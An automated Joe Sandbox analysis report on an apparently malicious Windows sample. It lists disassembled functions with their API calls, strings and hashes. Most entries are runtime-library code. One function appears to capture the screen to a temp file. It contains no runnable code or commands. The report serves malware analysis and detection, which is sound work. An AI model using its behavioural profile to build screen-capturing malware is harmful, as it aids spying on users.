                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021F8
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00402206
                                                        • SetBkMode.GDI32(?,00000001), ref: 00402283
                                                        • SetTextColor.GDI32(?,00000000), ref: 00402292
                                                        • _wcslen.LIBCMT ref: 0040229B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                        • String ID: Tahoma
                                                        • API String ID: 3832963559-3580928618
                                                        • Opcode ID: abba52d6847b12fe0ef92b8c09c3f71f9fb3bd9472e68441846bf1e5ef91a6b5
                                                        • Instruction ID: 010c8dd0ade12b0eef00d8562bcf10ebda5dfd6cd9d9fcac1ad08c501085cdf2
                                                        • Opcode Fuzzy Hash: abba52d6847b12fe0ef92b8c09c3f71f9fb3bd9472e68441846bf1e5ef91a6b5
                                                        • Instruction Fuzzy Hash: E871FD72900228AFDB22DF64DD85FAEB7BCEB09B11F0041A5B609E6151DA74AF81CF14
                                                        Function 00402591 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(?), ref: 004025ED
                                                        • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025FF
                                                        • ReleaseCapture.USER32 ref: 00402612
                                                        • GetDC.USER32(00000000), ref: 00402639
                                                        • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026C0
                                                        • CreateCompatibleDC.GDI32(?), ref: 004026C9
                                                        • SelectObject.GDI32(00000000,00000000), ref: 004026D3
                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 00402701
                                                        • ShowWindow.USER32(?,00000000), ref: 0040270A
                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 0040271C
                                                        • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402737
                                                        • DeleteFileW.KERNEL32(?), ref: 00402751
                                                        • DeleteDC.GDI32(00000000), ref: 00402758
                                                        • DeleteObject.GDI32(00000000), ref: 0040275F
                                                        • ReleaseDC.USER32(00000000,?), ref: 0040276D
                                                        • DestroyWindow.USER32(?), ref: 00402774
                                                        • SetCapture.USER32(?), ref: 004027C1
                                                        • GetDC.USER32(00000000), ref: 004027F5
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0040280B
                                                        • GetKeyState.USER32(0000001B), ref: 00402818
                                                        • DestroyWindow.USER32(?), ref: 0040282D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                        • String ID: gya
                                                        • API String ID: 2545303185-1989253062
                                                        • Opcode ID: 801bb6c124e375a82d20db098403c515f414ac510bec6d128129a9fc28d47c56
                                                        • Instruction ID: e71ef6788f7482d4de425a52166adb2a5dd74d508ff262b25753fab110ccc0fb
                                                        • Opcode Fuzzy Hash: 801bb6c124e375a82d20db098403c515f414ac510bec6d128129a9fc28d47c56
                                                        • Instruction Fuzzy Hash: 926181B5900209AFCB289F64ED48FAA7BB9FF49706F144179F605A22A2D774C941CF1C
                                                        Function 0042E6D2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free$Info
                                                        • String ID:
                                                        • API String ID: 2509303402-0
                                                        • Opcode ID: c37e14c16bc5e7a46ee425391025bd4e04b88596c533a8b7e5414dd032cd7fb9
                                                        • Instruction ID: ea2a752c51db2b1f33c6fb20177c4d444c994d8588285db844449b2f99ea92ea
                                                        • Opcode Fuzzy Hash: c37e14c16bc5e7a46ee425391025bd4e04b88596c533a8b7e5414dd032cd7fb9
                                                        • Instruction Fuzzy Hash: 7AB1C371A002159FDB11DF6AD841BEEB7F4FF18304F54452FE485AB342D77AA8418B14
                                                        Function 0043A618 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • ___free_lconv_mon.LIBCMT ref: 0043A65C
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 004399C8
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 004399DA
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 004399EC
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 004399FE
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A10
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A22
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A34
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A46
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A58
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A6A
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A7C
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A8E
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 00439AA0
                                                        • _free.LIBCMT ref: 0043A651
                                                          • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                          • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                        • _free.LIBCMT ref: 0043A673
                                                        • _free.LIBCMT ref: 0043A688
                                                        • _free.LIBCMT ref: 0043A693
                                                        • _free.LIBCMT ref: 0043A6B5
                                                        • _free.LIBCMT ref: 0043A6C8
                                                        • _free.LIBCMT ref: 0043A6D6
                                                        • _free.LIBCMT ref: 0043A6E1
                                                        • _free.LIBCMT ref: 0043A719
                                                        • _free.LIBCMT ref: 0043A720
                                                        • _free.LIBCMT ref: 0043A73D
                                                        • _free.LIBCMT ref: 0043A755
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                        • String ID:
                                                        • API String ID: 161543041-0
                                                        • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                        • Instruction ID: 8150cfcbb8d97c1a634bb94bc0336974ffbd25353871f942fa72eec07d372a2d
                                                        • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                        • Instruction Fuzzy Hash: D4316E315002009EEB219B35D886B5B73E8FF58315F14A51FE4D9CA251DB7AED508B1A
                                                        Function 00439AA9 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: 013650646774c5b7c47304d050aae00879c41c2523e9e3a904d24d31b9884639
                                                        • Instruction ID: 14d391df4236cd99baad955409263e6980f1ff06ffe499d5f8ebd119726a11a8
                                                        • Opcode Fuzzy Hash: 013650646774c5b7c47304d050aae00879c41c2523e9e3a904d24d31b9884639
                                                        • Instruction Fuzzy Hash: 16C14772D40205BBDB20DB98CC46FDEB7F8AB4C708F15515AFA04FB282D6B59E418B64
                                                        Function 0042486D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 104threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424886
                                                          • Part of subcall function 00424B55: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,004245B9), ref: 00424B65
                                                        • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042489B
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004248AA
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004248B8
                                                        • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042492E
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042496E
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0042497C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                        • String ID: 11@$pContext$switchState
                                                        • API String ID: 3151764488-3851367110
                                                        • Opcode ID: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                        • Instruction ID: b5099d2659ab5da3d856e1a370161b96529dd65552012442df5f2ab280934ec0
                                                        • Opcode Fuzzy Hash: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                        • Instruction Fuzzy Hash: 1331E575B002249BCF04EF65D881A6E77B5FF84314F60446BE915A7382DB78EE05C798
                                                        Function 0043EEC2 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004401AF), ref: 0043EEE5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: DecodePointer
                                                        • String ID: 11@$acos$asin$exp$log$log10$pow$sqrt
                                                        • API String ID: 3527080286-2461957735
                                                        • Opcode ID: c5a83a7c3a5692031bd98a2408cfaa5972c38f8111fe63a4894d5265efbafef3
                                                        • Instruction ID: 47f9428d28cfd6d6d0fcc487ca1ad96a5e838d4e1f3ed62f9574ed722bc2da70
                                                        • Opcode Fuzzy Hash: c5a83a7c3a5692031bd98a2408cfaa5972c38f8111fe63a4894d5265efbafef3
                                                        • Instruction Fuzzy Hash: 1A51A07490160ADBCF14DFA8E6481AEBBB0FF0D300F6551A7E480AB255C7798D29CB1E
                                                        Function 00419766 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419788
                                                        • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419792
                                                        • DuplicateHandle.KERNEL32(00000000), ref: 00419799
                                                        • SafeRWList.LIBCONCRT ref: 004197B8
                                                          • Part of subcall function 00417787: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417798
                                                          • Part of subcall function 00417787: List.LIBCMT ref: 004177A2
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197CA
                                                        • GetLastError.KERNEL32 ref: 004197D9
                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197EF
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004197FD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                        • String ID: eventObject
                                                        • API String ID: 1999291547-1680012138
                                                        • Opcode ID: f2fd52a031fb61bc76af8f85f01e8766478cf52a27c2f29204c16f3f9ad69e75
                                                        • Instruction ID: 74ee1ce6077461ea63ae9e00130f3aceb1e9566028cac9141ddd6988e3fa2b51
                                                        • Opcode Fuzzy Hash: f2fd52a031fb61bc76af8f85f01e8766478cf52a27c2f29204c16f3f9ad69e75
                                                        • Instruction Fuzzy Hash: 6511A075600105EACB14EFA5CC49FEF77B8AF00701F20012BF42AE21D1DB789E85866D
                                                        Function 0041515E Relevance: 15.2, APIs: 10, Instructions: 175COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415269
                                                          • Part of subcall function 00414C7A: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00414C8E
                                                        • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00415292
                                                          • Part of subcall function 004130F4: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00413110
                                                        • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004152B9
                                                        • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415173
                                                          • Part of subcall function 00413158: __EH_prolog3_GS.LIBCMT ref: 0041315F
                                                          • Part of subcall function 00413158: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 0041316E
                                                          • Part of subcall function 00413158: GetProcessAffinityMask.KERNEL32(00000000), ref: 00413175
                                                          • Part of subcall function 00413158: GetCurrentThread.KERNEL32 ref: 0041319D
                                                          • Part of subcall function 00413158: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 004131A7
                                                        • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415194
                                                        • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004151CB
                                                        • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 0041520E
                                                        • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00415301
                                                        • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415325
                                                        • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00415332
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
                                                        • String ID:
                                                        • API String ID: 64082781-0
                                                        • Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                        • Instruction ID: 3c4a00c01101e3417d492a63c26e06d94b1efbede92b5aee1480a2ddfdefe69c
                                                        • Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                        • Instruction Fuzzy Hash: A3618D71A00715DFDB18CFA5E8926EEB7B1FB84316F24806ED45697252C738A981CF4C
                                                        Function 00431E06 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 00431E1A
                                                          • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                          • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                        • _free.LIBCMT ref: 00431E26
                                                        • _free.LIBCMT ref: 00431E31
                                                        • _free.LIBCMT ref: 00431E3C
                                                        • _free.LIBCMT ref: 00431E47
                                                        • _free.LIBCMT ref: 00431E52
                                                        • _free.LIBCMT ref: 00431E5D
                                                        • _free.LIBCMT ref: 00431E68
                                                        • _free.LIBCMT ref: 00431E73
                                                        • _free.LIBCMT ref: 00431E81
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                        • Instruction ID: 37ceee84360c9df2d19b7be330e975e9230a82d8295317da332a0d8bba7d8220
                                                        • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                        • Instruction Fuzzy Hash: 9111A476100508AFCB02EF56C852CD93BA5EF18355F1190AAFA088F232DA76EF519F84
                                                        Function 0042E1D2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: __cftoe
                                                        • String ID: f(@$f(@
                                                        • API String ID: 4189289331-2391611762
                                                        • Opcode ID: 2396ca184a0ea6fadd607c802ee38f20c1982d3dd3cdaf5b94a241f1a857116a
                                                        • Instruction ID: 3bb8b72b3fcb016b6809a9d2676edbb9e39e2dfdcc2cff5661f77b8cf8a8e7b7
                                                        • Opcode Fuzzy Hash: 2396ca184a0ea6fadd607c802ee38f20c1982d3dd3cdaf5b94a241f1a857116a
                                                        • Instruction Fuzzy Hash: 8F511B32600215EBDB249B5BAC41EAF77ADEF49325F90425FF815D6282DB3DD900867C
                                                        Function 004286F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _ValidateLocalCookies.LIBCMT ref: 0042871B
                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00428723
                                                        • _ValidateLocalCookies.LIBCMT ref: 004287B1
                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 004287DC
                                                        • _ValidateLocalCookies.LIBCMT ref: 00428831
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                        • String ID: 11@$@fB$csm
                                                        • API String ID: 1170836740-1464837749
                                                        • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                        • Instruction ID: 85514cbf9916709cbd5a6cdf55cb31cf47df2c82886cb460035ca25a3a5e93b8
                                                        • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                        • Instruction Fuzzy Hash: E6411634B012289BCF00DF29DC41A9E7BB1AF80328F64815FE8146B392DB399D11CB99
                                                        Function 00430EE2 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                          • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                          • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                        • _memcmp.LIBVCRUNTIME ref: 0043118C
                                                        • _free.LIBCMT ref: 004311FD
                                                        • _free.LIBCMT ref: 00431216
                                                        • _free.LIBCMT ref: 00431248
                                                        • _free.LIBCMT ref: 00431251
                                                        • _free.LIBCMT ref: 0043125D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorLast$_memcmp
                                                        • String ID: 11@
                                                        • API String ID: 4275183328-1785270423
                                                        • Opcode ID: e83dd170e9aceaa49a18aa447ce4e6aa2231a1eba3255cf494227ba5bae8955a
                                                        • Instruction ID: ce7b668dfa5c2bb7c4e9a3ceca6e831dbf532e5f0ec0879f8663b0dec614f287
                                                        • Opcode Fuzzy Hash: e83dd170e9aceaa49a18aa447ce4e6aa2231a1eba3255cf494227ba5bae8955a
                                                        • Instruction Fuzzy Hash: ABB13975A016199FDB24DF18C894AAEB7B4FF08304F1086EEE949A7360D775AE90CF44
                                                        Function 0040C63D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 37COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C69C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throw
                                                        • String ID: :3@$f(@$f(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                        • API String ID: 2005118841-316725708
                                                        • Opcode ID: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                        • Instruction ID: d382e3a4140bff2bd7f1e847cb7cd930782ec9a0d5dc38d66c16a87299b4fd47
                                                        • Opcode Fuzzy Hash: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                        • Instruction Fuzzy Hash: 8BF0FC72900208AAC714DB54DC82BAB33589B15305F14857BED41BA1C2EA7DAD05C79C
                                                        Function 00432154 Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D958,0042D958,?,?,?,004323A5,00000001,00000001,23E85006), ref: 004321AE
                                                        • __alloca_probe_16.LIBCMT ref: 004321E6
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004323A5,00000001,00000001,23E85006,?,?,?), ref: 00432234
                                                        • __alloca_probe_16.LIBCMT ref: 004322CB
                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043232E
                                                        • __freea.LIBCMT ref: 0043233B
                                                          • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                        • __freea.LIBCMT ref: 00432344
                                                        • __freea.LIBCMT ref: 00432369
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                        • String ID:
                                                        • API String ID: 3864826663-0
                                                        • Opcode ID: b11f90d838427d37edd64e38e717b3af24babdf9d4b4099e4006f2966c914547
                                                        • Instruction ID: a5f38111fa01d07f603b669534a8c8f44d85fc048aacd33138e2e818ffff9497
                                                        • Opcode Fuzzy Hash: b11f90d838427d37edd64e38e717b3af24babdf9d4b4099e4006f2966c914547
                                                        • Instruction Fuzzy Hash: B8513672600606AFDB258F75CD81EBF37A9EB48754F24426AFD04E6250DBBCDC40C658
                                                        Function 00439ECE Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: cb4d3308ea5a93ba8490e2e938d95f7beab743b864a9d83c10aec8bd6e5a7d8e
                                                        • Instruction ID: 1cba7b180e09f8073ff63dd7a5e39a9331c2ed4ff1a144fb7a18fbb91be6d7aa
                                                        • Opcode Fuzzy Hash: cb4d3308ea5a93ba8490e2e938d95f7beab743b864a9d83c10aec8bd6e5a7d8e
                                                        • Instruction Fuzzy Hash: 0761F071900205AFDB24DF69C842B9ABBF4EF09710F10516BE884EB382E7799E418B59
                                                        Function 004338A3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleCP.KERNEL32(?,0042C25D,E0830C40,?,?,?,?,?,?,00434018,0040DDFA,0042C25D,?,0042C25D,0042C25D,0040DDFA), ref: 004338E5
                                                        • __fassign.LIBCMT ref: 00433960
                                                        • __fassign.LIBCMT ref: 0043397B
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,0042C25D,00000001,?,00000005,00000000,00000000), ref: 004339A1
                                                        • WriteFile.KERNEL32(?,?,00000000,00434018,00000000,?,?,?,?,?,?,?,?,?,00434018,0040DDFA), ref: 004339C0
                                                        • WriteFile.KERNEL32(?,0040DDFA,00000001,00434018,00000000,?,?,?,?,?,?,?,?,?,00434018,0040DDFA), ref: 004339F9
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                        • String ID:
                                                        • API String ID: 1324828854-0
                                                        • Opcode ID: 104bec089efa8ddbbf106d3ba7b26555e8bb7f605cb6606e0c3875e27b37aebe
                                                        • Instruction ID: 3302cc5d055cfa7cb2d102f804d659735755d65fc8cb0b0a8ea62d8a9f37e22e
                                                        • Opcode Fuzzy Hash: 104bec089efa8ddbbf106d3ba7b26555e8bb7f605cb6606e0c3875e27b37aebe
                                                        • Instruction Fuzzy Hash: 1E51B3B09002499FCB10DFA8D845BEEBBF4EF09701F14412BE556E7391E7349A51CB69
                                                        Function 0043F961 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                        • Instruction ID: 44ae7d58254669835104620532439e4651bcdc670411f054606b0734315a2d03
                                                        • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                        • Instruction Fuzzy Hash: B3112772A00215BFCB212FB3AC05E6B7A5CEF8A725F10063BF815D7240DA38890486A9
                                                        Function 0043A3A3 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
